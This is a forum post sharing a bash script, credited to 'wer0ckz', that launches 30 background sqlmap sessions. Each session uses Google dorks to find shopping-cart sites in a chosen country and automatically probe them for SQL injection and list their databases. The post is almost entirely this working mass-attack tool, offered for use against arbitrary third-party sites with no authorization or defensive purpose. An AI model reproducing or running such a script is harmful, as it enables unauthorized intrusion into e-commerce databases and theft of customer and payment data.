Jump to content
alien

SQLMAP mass scanner

Recommended Posts

Posted

Automated script to scan SQLI by country.


#!/bin/bash
# [*]
# [*] Sqlmap automatic scanner by wer0ckz
# [*] This tool is designed to scan sql injection by country specific together with shopping sites targets
# [*] It creates 30 screens with sqlmap running
# [*]
clear
echo -n “Enter country (ex. ca, au, ph): ”
read -e COUNTRY
if [ -d $COUNTRY ]
then echo Country $COUNTRY is here. Exit!
else
echo “[*] Sqlmap mass scanner by wer0ckz”
echo “[*]”
echo “[*] Downloading Sqlmap..”
echo “[*]”
echo “[*]”
wget -nv http://downloads.sourceforge.net/sqlmap/sqlmap-0.9.tar.gz
tar zxf sqlmap-0.9.tar.gz
mv sqlmap $COUNTRY
rm ${COUNTRY}/lib/utils/google.py
echo “[*]”
echo “[*] Updating google scanner..”
wget -nv https://svn.sqlmap.org/sqlmap/trunk/sqlmap/lib/utils/google.py
mv google.py ${COUNTRY}/lib/utils/google.py
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:shop cart” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:shop cart” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:shop cart” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:shop id” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:shop id” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:shop id” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:shop item” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:shop item” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:shop item” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:shop buy” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:shop buy” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:shop buy” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:shop product” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:shop product” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:shop product” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:cart cart” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:cart cart” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:cart cart” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:cart id” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:cart id” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:cart id” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:cart item” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:cart item” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:cart item” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:cart buy” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:cart buy” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:cart buy” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:cart product” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:cart product” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:cart product” –dbs –batch
echo “[*]”
echo “[*]”
echo “[*] Done! 30 sqlmap running”
echo “[*] Type ‘screen -r’ to check status”
fi

Source: http://shipcodex.blogspot.ro/2012/02/sqlmap-automatic-scanner-by-wer0ckz.html

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...